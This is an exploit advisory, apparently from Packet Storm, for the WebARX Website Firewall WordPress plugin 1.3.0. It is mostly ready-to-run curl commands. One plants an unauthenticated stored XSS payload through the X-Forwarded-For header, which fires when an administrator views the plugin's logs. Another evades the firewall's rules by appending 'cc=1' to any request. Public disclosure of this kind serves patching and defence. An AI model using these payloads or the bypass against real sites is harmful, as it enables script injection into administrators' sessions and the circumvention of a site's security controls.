WordPress WebARX Website Firewall 4.9.8 XSS / Bypass

2018-09-27T00:00:00
ID PACKETSTORM:149573
Type packetstorm
Reporter ed0x21son
Modified 2018-09-27T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress WebARX Website Firewall - Stored XSS and firewall bypass.  
# Type: WordPress Plugin  
# Date: 2018-09-27  
# Exploit Author: ed0x21son  
# Vendor Homepage: https://www.webarxsecurity.com  
# Software Link: http://update.webarxsecurity.com/wp-update-server/?action=download&slug=webarx  
# Version: 1.3.0  
# Category: WebApps, WordPress  
# Tested on: WordPress 4.9.8  
  
  
[Vulnerabilities]  
  
#1: Unauthenticated stored XSS:  
  
curl -I -H 'X-Forwarded-For: <script>alert("U-H4V3-B33N-PWN3D")</script>' 'http://localhost/?xss=<script>alert(/pwn3d/)</script>'  
  
Go to Wordpress dashboard and view WebARX logs: pwnd!  
  
  
#2: Firewall bypass:  
  
U can bypass all firewall security and rules if u add "cc=1" to the Post or Get payload.  
  
Blocked by firewall:  
curl 'http://localhost/?xss=<script>alert(/pwn3d/)</script>'  
  
Not blocked by firewall:  
curl 'http://localhost/?xss=<script>alert(/pwn3d/)</script>&cc=1'  
  
  
  
--ed0x21son  
  
`